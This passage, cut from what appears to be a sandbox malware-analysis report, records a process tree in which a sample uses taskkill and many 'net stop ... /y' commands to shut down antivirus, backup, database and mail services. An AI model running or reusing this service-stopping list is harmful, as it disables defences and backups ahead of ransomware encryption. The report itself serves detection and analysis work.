  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3772
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3320
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3848
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Acronis VSS Provider" /y
  2⤵
  PID:3412
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Acronis VSS Provider" /y
    3⤵
    PID:2820
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Enterprise Client Service" /y
  2⤵
  PID:636
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Enterprise Client Service" /y
    3⤵
    PID:4336
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos Agent" /y
  2⤵
  PID:3292
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Agent" /y
    3⤵
    PID:1676
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos AutoUpdate Service" /y
  2⤵
  PID:2420
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos AutoUpdate Service" /y
    3⤵
    PID:3644
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos Clean Service" /y
  2⤵
  PID:2096
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Clean Service" /y
    3⤵
    PID:4548
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos Device Control Service" /y
  2⤵
  PID:2804
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Device Control Service" /y
    3⤵
    PID:4964
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos File Scanner Service" /y
  2⤵
  PID:3608
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos File Scanner Service" /y
    3⤵
    PID:5052
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos Health Service" /y
  2⤵
  PID:1728
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Health Service" /y
    3⤵
    PID:3600
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos MCS Agent" /y
  2⤵
  PID:4264
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos MCS Agent" /y
    3⤵
    PID:3592
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos MCS Client" /y
  2⤵
  PID:1148
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos MCS Client" /y
    3⤵
    PID:3496
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos Message Router" /y
  2⤵
  PID:4292
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Message Router" /y
    3⤵
    PID:224
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos Safestore Service" /y
  2⤵
  PID:992
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Safestore Service" /y
    3⤵
    PID:2608
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos System Protection Service" /y
  2⤵
  PID:2512
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos System Protection Service" /y
    3⤵
    PID:3484
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos Web Control Service" /y
  2⤵
  PID:1056
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Web Control Service" /y
    3⤵
    PID:1576
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "SQLsafe Backup Service" /y
  2⤵
  PID:4452
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SQLsafe Backup Service" /y
    3⤵
    PID:1744
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "SQLsafe Filter Service" /y
  2⤵
  PID:4668
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SQLsafe Filter Service" /y
    3⤵
    PID:2996
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Symantec System Recovery" /y
  2⤵
  PID:2296
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Symantec System Recovery" /y
    3⤵
    PID:3252
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Veeam Backup Catalog Data Service" /y
  2⤵
  PID:3172
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y
    3⤵
    PID:988
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop AcronisAgent /y
  2⤵
  PID:808
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:4364
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop AcrSch2Svc /y
  2⤵
  PID:3596
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:4416
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop Antivirus /y
  2⤵
  PID:212
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Antivirus /y
    3⤵
    PID:3296
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ARSM /y
  2⤵
  PID:3324
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ARSM /y
    3⤵
    PID:732
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:4232
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:1960
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:740
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:636
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop BackupExecDeviceMediaService /y
  2⤵
  PID:3880
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
    3⤵
    PID:4216
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:2564
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:2300
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop BackupExecManagementService /y
  2⤵
  PID:2248
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:2344
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop BackupExecRPCService /y
  2⤵
  PID:4476
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:3676
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:3412
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:1696
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop bedbg /y
  2⤵
  PID:2860
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop bedbg /y
    3⤵
    PID:4120
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop DCAgent /y
  2⤵
  PID:3644
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop DCAgent /y
    3⤵
    PID:1856
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop EPSecurityService /y
  2⤵
  PID:4712
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EPSecurityService /y
    3⤵
    PID:3108
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop EPUpdateService /y
  2⤵
  PID:2540
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EPUpdateService /y
    3⤵
    PID:2684
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop EraserSvc11710 /y
  2⤵
  PID:3976
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EraserSvc11710 /y
    3⤵
    PID:4052
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop EsgShKernel /y
  2⤵
  PID:3600
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3904
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EsgShKernel /y
    3⤵
    PID:184
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop FA_Scheduler /y
  2⤵
  PID:2748
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4336
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop FA_Scheduler /y
    3⤵
    PID:740
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop IISAdmin /y
  2⤵
  PID:2208
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3632
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop IISAdmin /y
    3⤵
    PID:3324
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop IMAP4Svc /y
  2⤵
  PID:4980
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop IMAP4Svc /y
    3⤵
    PID:3580
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop macmnsvc /y
  2⤵
  PID:3864
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop macmnsvc /y
    3⤵
    PID:2724
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop masvc /y
  2⤵
  PID:3172
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop masvc /y
    3⤵
    PID:2188
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MBAMService /y
  2⤵
  PID:3424
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MBAMService /y
    3⤵
    PID:4900
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MBEndpointAgent /y
  2⤵
  PID:2820
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MBEndpointAgent /y
    3⤵
    PID:1004
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop McAfeeEngineService /y
  2⤵
  PID:4000
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeEngineService /y
    3⤵
    PID:812
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop McAfeeFramework /y
  2⤵
  PID:4524
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeFramework /y
    3⤵
    PID:3280
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop McAfeeFrameworkMcAfeeFramework /y
  2⤵
  PID:2416
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
    3⤵
    PID:2512
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop McShield /y
  2⤵
  PID:1064
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McShield /y
    3⤵
    PID:3984
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop McTaskManager /y
  2⤵
  PID:3360
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McTaskManager /y
    3⤵
    PID:4548
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop mfemms /y
  2⤵
  PID:3968
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfemms /y
    3⤵
    PID:2204
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop mfevtp /y
  2⤵
  PID:4020
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfevtp /y
    3⤵
    PID:1056
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MMS /y
  2⤵
  PID:1960
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MMS /y
    3⤵
    PID:2652
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop mozyprobackup /y
  2⤵
  PID:2344
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mozyprobackup /y
    3⤵
    PID:2388
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MsDtsServer /y
  2⤵
  PID:2708
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MsDtsServer /y
    3⤵
    PID:4108
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MsDtsServer100 /y
  2⤵
  PID:2592
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MsDtsServer100 /y
    3⤵
    PID:2420
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MsDtsServer110 /y
  2⤵
  PID:1956
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MsDtsServer110 /y
    3⤵
    PID:1668
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSExchangeES /y
  2⤵
  PID:876
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeES /y
    3⤵
    PID:2088
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSExchangeIS /y
  2⤵
  PID:4440
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeIS /y
    3⤵
    PID:5028
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSExchangeMGMT /y
  2⤵
  PID:5040
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeMGMT /y
    3⤵
    PID:2736
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSExchangeMTA /y
  2⤵
  PID:1324
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeMTA /y
    3⤵
    PID:4564
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSExchangeSA /y
  2⤵
  PID:1792
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeSA /y
    3⤵
    PID:2724
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSExchangeSRS /y
  2⤵
  PID:2932
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:636
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeSRS /y
    3⤵
    PID:3612
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSOLAP$SQL_2008 /y
  2⤵
  PID:4184
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
    3⤵
    PID:4024
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSOLAP$SYSTEM_BGC /y
  2⤵
  PID:740
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
    3⤵
    PID:3428
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSOLAP$TPS /y
  2⤵
  PID:4752
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$TPS /y
    3⤵
    PID:808
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSOLAP$TPSAMA /y
  2⤵
  PID:3172
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4456
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
    3⤵
    PID:1560
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$BKUPEXEC /y
  2⤵
  PID:2104
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
    3⤵
    PID:4780
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$ECWDB2 /y
  2⤵
  PID:3480
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
    3⤵
    PID:2096
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$PRACTICEMGT /y
  2⤵
  PID:2812
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
    3⤵
    PID:4304
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$PRACTTICEBGC /y
  2⤵
  PID:4124
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
    3⤵
    PID:4884
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$PROFXENGAGEMENT /y
  2⤵
  PID:2016
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
    3⤵
    PID:4252
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$SBSMONITORING /y
  2⤵
  PID:4524
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
    3⤵
    PID:4492
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$SHAREPOINT /y
  2⤵
  PID:4128
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
    3⤵
    PID:2208
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$SQL_2008 /y
  2⤵
  PID:380
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2512
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
    3⤵
    PID:2656
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$SYSTEM_BGC /y
  2⤵
  PID:2652
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
    3⤵
    PID:5028
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$TPS /y
  2⤵
  PID:2780
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$TPS /y
    3⤵
    PID:2908
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$TPSAMA /y
  2⤵
  PID:2948
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
    3⤵
    PID:2164
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:5088
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2420
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:4696
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2012 /y
  2⤵
  PID:1088
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
    3⤵
    PID:2252
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLFDLauncher /y
  2⤵
  PID:3684
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher /y
    3⤵
    PID:4024
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
  2⤵
  PID:772
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4052
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
    3⤵
    PID:1096
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
  2⤵
  PID:212
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
    3⤵
    PID:3076
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
  2⤵
  PID:3964
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
    3⤵
    PID:2756
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SQL_2008 /y
  2⤵
  PID:1324
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
    3⤵
    PID:2820
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
  2⤵
  PID:2156
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
    3⤵
    PID:4400
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLFDLauncher$TPS /y
  2⤵
  PID:5008
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
    3⤵
    PID:2028
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLFDLauncher$TPSAMA /y
  2⤵
  PID:1744
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4476
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
    3⤵
    PID:2104
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLSERVER /y
  2⤵
  PID:4428
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLSERVER /y
    3⤵
    PID:4948
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLServerADHelper100 /y
  2⤵
  PID:812
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
    3⤵
    PID:1952
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLServerOLAPService /y
  2⤵
  PID:4892
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4780
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
    3⤵
    PID:2092
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MySQL80 /y
  2⤵
  PID:1668
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MySQL80 /y
    3⤵
    PID:2720
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MySQL57 /y
  2⤵
  PID:3580
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MySQL57 /y
    3⤵
    PID:2224
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ntrtscan /y
  2⤵
  PID:4376
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ntrtscan /y
    3⤵
    PID:2532
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop OracleClientCache80 /y
  2⤵
  PID:3592
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop OracleClientCache80 /y
    3⤵
    PID:3364
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop PDVFSService /y
  2⤵
  PID:4568
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3424
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:3812
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop POP3Svc /y
  2⤵
  PID:4652
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop POP3Svc /y
    3⤵
    PID:3276
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ReportServer /y
  2⤵
  PID:3056
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer /y
    3⤵
    PID:1116
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ReportServer$SQL_2008 /y
  2⤵
  PID:3920
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
    3⤵
    PID:1056
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ReportServer$SYSTEM_BGC /y
  2⤵
  PID:4664
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3320
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
    3⤵
    PID:2252
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ReportServer$TPS /y
  2⤵
  PID:3548
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$TPS /y
    3⤵
    PID:2304
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ReportServer$TPSAMA /y
  2⤵
  PID:3176
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
    3⤵
    PID:1416
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop RESvc /y
  2⤵
  PID:2116
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RESvc /y
    3⤵
    PID:820
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop sacsvr /y
  2⤵
  PID:4704
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2684
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sacsvr /y
    3⤵
    PID:2756
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SamSs /y
  2⤵
  PID:1680
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SamSs /y
    3⤵
    PID:3964
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SAVAdminService /y
  2⤵
  PID:3600
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SAVAdminService /y
    3⤵
    PID:4412
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SAVService /y
  2⤵
  PID:3696
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SAVService /y
    3⤵
    PID:4172
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SDRSVC /y
  2⤵
  PID:1324
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SDRSVC /y
    3⤵
    PID:2632
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SepMasterService /y
  2⤵
  PID:2840
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SepMasterService /y
    3⤵
    PID:956
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ShMonitor /y
  2⤵
  PID:3124
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2028
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ShMonitor /y
    3⤵
    PID:3268
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop Smcinst /y
  2⤵
  PID:2864
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Smcinst /y
    3⤵
    PID:2656
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SmcService /y
  2⤵
  PID:4632
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SmcService /y
    3⤵
    PID:4856
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SMTPSvc /y
  2⤵
  PID:3848
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SMTPSvc /y
    3⤵
    PID:2088
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SNAC /y
  2⤵
  PID:4948
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SNAC /y
    3⤵
    PID:3292
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SntpService /y
  2⤵
  PID:3360
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SntpService /y
    3⤵
    PID:4500
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop sophossps /y
  2⤵
  PID:3624
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2092
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sophossps /y
    3⤵
    PID:3732
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$BKUPEXEC /y
  2⤵
  PID:1060
- - C:\Windows\system32\net1.exe
